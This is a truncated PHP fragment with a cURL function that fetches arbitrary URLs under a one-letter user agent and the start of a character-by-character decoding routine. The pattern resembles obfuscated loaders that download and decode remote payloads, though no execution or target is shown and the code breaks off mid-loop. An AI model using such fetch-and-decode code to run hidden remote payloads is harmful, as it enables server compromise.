function e($url) { $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'e'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); $r=curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function de($d) { $end=substr($d, strlen($d) -2); $array=str_split($d); $result=''; for ($i=0;$i